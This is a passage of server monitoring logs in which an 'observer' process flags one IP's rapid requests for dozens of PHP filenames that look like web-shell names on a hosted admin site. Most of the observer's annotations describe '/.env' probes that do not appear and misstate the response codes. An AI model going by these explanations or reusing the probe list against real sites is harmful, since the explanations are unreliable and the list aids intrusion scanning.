Line=2026-03-20T09:11:39.881090949Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.949302 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.949017179Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.017343 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:40.016956333Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.085999 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.085734935Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.153464 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.153206369Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.221584 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.221336948Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.289066 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:40.288783355Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.356962 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.356689460Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.425224 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.424952223Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.493675 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.493434325Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.561016 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:40.560564426Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /t.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.629191 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.628901766Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /t.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.696239 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.695928794Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /file.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.764112 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.763869822Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /file.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.835289 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:40.835041819Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /66.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.903055 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.902816504Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /66.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.970114 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.969882029Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.037989 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.037720122Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.113427 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:41.113129994Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.181307 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.181034072Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.248852 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.248508219Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.326930 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.326674172Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.394428 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:41.394123147Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.464031 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.463782082Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.531336 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.531020833Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.601331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.601060263Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.669247 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:41.668983011Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.737172 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.736892842Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.804401 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.804143231Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.872214 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.871930526Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.939459 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:41.939135952Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.011843 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.011569801Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.078991 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.078709674Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.146578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.146343361Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.213717 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:42.213423077Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.281544 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.281273826Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.348742 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.348370281Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.416576 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.416334023Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.484923 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:42.484695833Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.559845 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.559605598Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.627054 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.626807887Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.724578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:42.724326297Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.796823 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:42.796405781Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.864793 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.864401085Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.943220 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.942967622Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.012094 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.011815769Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.081456 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:43.081200858Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.150140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.149894367Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.230106 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.229826877Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.298952 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.298675924Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.397465 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:43.397148224Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.465215 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.464934551Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.532329 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.532067527Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.605727 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:43.605492908Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.684779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:43.684347508Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.752406 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.752134345Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.819498 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.819245649Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.887479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.887245446Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.954619 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:43.954331722Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /install.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.024512 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.023574666Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /install.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.204754 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.204412807Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.388969 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.388716937Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.460379 [SUSPICIOUS] 